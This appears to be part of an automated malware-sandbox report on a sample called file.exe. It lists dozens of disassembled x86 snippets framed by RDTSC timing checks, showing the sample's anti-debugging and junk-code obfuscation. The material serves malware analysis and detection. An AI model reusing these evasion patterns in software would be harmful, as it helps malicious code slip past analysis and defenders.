Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2028 second address: 9D20CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F3556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F1A796F3548h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007F1A796F3556h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F1A796F3548h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 call 00007F1A796F3553h 0x0000004b mov di, CD05h 0x0000004f pop edi 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D25ECh], edx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D20CC second address: 9D20D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D20D0 second address: 9D20D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D28F1 second address: 9D28F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3B6D second address: 9D3C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F1A796F3548h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F1A796F3557h 0x00000029 and edi, 4B6953F8h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F1A796F3548h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov si, di 0x0000004e push 00000000h 0x00000050 mov dword ptr [ebp+12471B57h], edx 0x00000056 mov esi, ecx 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007F1A796F354Fh 0x00000061 jg 00007F1A796F3546h 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3C08 second address: 9D3C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D46F1 second address: 9D4773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F1A796F3548h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F1A796F3548h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, 2F934E17h 0x00000030 call 00007F1A796F3554h 0x00000035 mov edi, dword ptr [ebp+122D1914h] 0x0000003b pop esi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F1A796F3548h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 push 00000000h 0x0000005a mov edi, ecx 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jg 00007F1A796F3546h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5DC6 second address: 9D5E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F1A796B9BE8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jmp 00007F1A796B9BECh 0x0000002b push 00000000h 0x0000002d jmp 00007F1A796B9BEAh 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D39C1h] 0x0000003a xchg eax, ebx 0x0000003b jnc 00007F1A796B9BF4h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5E3A second address: 9D5E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5E3E second address: 9D5E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5E42 second address: 9D5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5E48 second address: 9D5E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5E4E second address: 9D5E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D687B second address: 9D6883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6883 second address: 9D6889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D721D second address: 9D7271 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1A796B9BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, ebx 0x0000000d push 00000000h 0x0000000f movsx edi, bx 0x00000012 push 00000000h 0x00000014 js 00007F1A796B9C02h 0x0000001a jnp 00007F1A796B9BFCh 0x00000020 call 00007F1A796B9BF5h 0x00000025 pop edi 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push edx 0x00000029 jmp 00007F1A796B9BF2h 0x0000002e pop edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jp 00007F1A796B9BE6h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7271 second address: 9D7275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA442 second address: 9DA45D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1A796B9BF4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA45D second address: 9DA461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA461 second address: 9DA495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F1A796B9BECh 0x0000000d nop 0x0000000e and ebx, dword ptr [ebp+122D36B1h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+122D3734h], eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push edi 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pushad 0x00000025 je 00007F1A796B9BE6h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB353 second address: 9DB359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB359 second address: 9DB35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB35D second address: 9DB3C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F1A796F3550h 0x0000000f nop 0x00000010 jmp 00007F1A796F3552h 0x00000015 push 00000000h 0x00000017 movzx edi, bx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F1A796F3548h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 xchg eax, esi 0x00000037 push esi 0x00000038 jmp 00007F1A796F354Ah 0x0000003d pop esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB3C0 second address: 9DB3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB3C4 second address: 9DB3CE instructions: 0x00000000 rdtsc 0x00000002 je 00007F1A796F3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC432 second address: 9DC45C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796B9BF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F1A796B9BECh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC45C second address: 9DC4B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F1A796F3546h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F1A796F3548h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov di, AD00h 0x0000002d mov dword ptr [ebp+12451200h], ecx 0x00000033 push 00000000h 0x00000035 xchg eax, esi 0x00000036 push esi 0x00000037 ja 00007F1A796F3554h 0x0000003d pop esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC4B6 second address: 9DC4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC4BA second address: 9DC4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1A796F354Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E03A5 second address: 9E03FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1A796B9BE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F1A796B9BE8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2596h], ebx 0x0000002f push 00000000h 0x00000031 jno 00007F1A796B9BECh 0x00000037 push 00000000h 0x00000039 mov edi, eax 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d jmp 00007F1A796B9BEDh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF5C3 second address: 9DF5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E063D second address: 9E0641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2467 second address: 9E246D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E246D second address: 9E2471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E33FE second address: 9E3402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E43AF second address: 9E441B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1A796B9BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F1A796B9C01h 0x00000011 pushad 0x00000012 ja 00007F1A796B9BE6h 0x00000018 jmp 00007F1A796B9BF3h 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F1A796B9BE8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 and di, 3BE4h 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D1B48h], eax 0x00000046 push 00000000h 0x00000048 add ebx, 3B9CB664h 0x0000004e mov ebx, dword ptr [ebp+122D3B3Dh] 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E441B second address: 9E4420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4420 second address: 9E4434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796B9BF0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4434 second address: 9E4438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4438 second address: 9E4446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E469B second address: 9E469F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E650F second address: 9E6513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E56DD second address: 9E56E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7596 second address: 9E759C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E759C second address: 9E75AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1A796F354Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E75AE second address: 9E75CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1A796B9BF5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E66A5 second address: 9E672A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007F1A796F3546h 0x0000000d pop esi 0x0000000e popad 0x0000000f nop 0x00000010 push ebx 0x00000011 mov ebx, dword ptr [ebp+122D3AB5h] 0x00000017 pop edi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, dword ptr [ebp+1246A86Bh] 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F1A796F3548h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D38A1h] 0x0000004c mov eax, dword ptr [ebp+122D08DDh] 0x00000052 stc 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007F1A796F3548h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 00000018h 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f mov dword ptr [ebp+122D2881h], ebx 0x00000075 push eax 0x00000076 pushad 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E75CE second address: 9E7611 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov cx, 31B7h 0x0000000e popad 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F1A796B9BE8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D3734h], edi 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 jc 00007F1A796B9BECh 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E672A second address: 9E674A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1A796F3558h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E96A3 second address: 9E96B2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1A796B9BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E96B2 second address: 9E96BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1A796F3546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7818 second address: 9E782F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007F1A796B9BECh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EACC1 second address: 9EAD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F1A796F3548h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 mov edi, dword ptr [ebp+122D38D5h] 0x00000026 pushad 0x00000027 mov edx, dword ptr [ebp+122D1AE4h] 0x0000002d jng 00007F1A796F3548h 0x00000033 mov cl, CFh 0x00000035 popad 0x00000036 push 00000000h 0x00000038 movzx edi, bx 0x0000003b push 00000000h 0x0000003d mov ebx, dword ptr [ebp+122D191Ah] 0x00000043 xchg eax, esi 0x00000044 push esi 0x00000045 push edi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAD0C second address: 9EAD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 js 00007F1A796B9BFDh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F051F second address: 9F0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0524 second address: 9F052E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1A796B9BF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F052E second address: 9F0542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1A796F3546h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jnc 00007F1A796F3546h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0542 second address: 9F056A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push edi 0x00000013 jmp 00007F1A796B9BF2h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F056A second address: 9F0586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F1A796F3546h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F1A796F3546h 0x00000016 jc 00007F1A796F3546h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9959E4 second address: 9959E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9959E9 second address: 9959F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jng 00007F1A796F354Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F42EF second address: 9F42FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4595 second address: 9F459B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F459B second address: 9F45A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F45A6 second address: 9F45B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1A796F3546h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F45B7 second address: 9F45C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F1A796B9BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBE0F second address: 9FBE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1A796F355Ah 0x0000000a jmp 00007F1A796F3554h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBE34 second address: 9FBE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBE38 second address: 9FBE46 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1A796F3546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
